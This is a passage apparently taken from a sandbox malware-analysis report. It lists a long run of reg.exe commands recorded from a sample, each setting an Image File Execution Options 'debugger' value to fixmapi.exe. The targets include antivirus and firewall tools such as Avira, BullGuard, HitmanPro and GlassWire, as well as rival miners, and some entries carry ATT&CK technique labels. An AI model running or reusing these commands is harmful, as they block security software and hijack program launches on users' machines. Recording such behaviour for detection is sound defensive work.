    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xDedicLogCleaner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\storectrl.dll" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows nt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsynchost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ClearLock.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Intelme.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchoct.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smsss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mineos.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-aes-sse42.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:400
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSSysCtl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NsCpuCNMiner64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AES.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Drop Box Update.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rebel Botnet.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prkiller.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vnchosts.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeCP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HitmanPro x64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HS_Svc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SQLSystem.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcLi.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hpssmhd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TIASPN~1.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlog.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrssas.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASP.NET.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GWCtlSrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GWIdlMon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winpoint.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:880
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Javagroup.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\op_mon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.ServiceHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.Systray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minerd_dp_com.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minerd_cp_fr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sys32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winhost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nusb3mon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsmon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBSRService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\praetorian.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seth.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AVX_AES.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\esif.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3096
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccsce.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reminder.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wahiver.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wahiver64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waspwing.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wizard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WMIC.exe.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debugger" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixmapi.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchProtocolHos.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qpis.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devencl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iddlen.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msapp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscce.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchosd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VIRITSVC.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MONITOR.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MtxHotPlugService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frog.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\network-update.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmadavProtect32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vercls.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Fiddlere.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinHide.SB.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\host32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mworker.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicroMiner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2976
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JavaUpdater.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2264
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfusclient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rkfree.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysdisk.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\volumedisk.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ITbrain_AntiMalware_Service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\javal.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NsCpuCNMiner32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Photo.scr" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmiapsvr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wnhelp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gcclient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetTimeService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Time Discovery
    PID:2140
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeskLock.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemTaskinfo.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemTask.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scriptrap.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetTraffic.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:5020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iimaia.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NTTacP.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xStarter.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4160
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spools.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spooIsv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Win_Updater.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2guard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atiecla.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dmdjmg.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cavwp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardBhvScanner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardScanner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchsot.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemNT.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
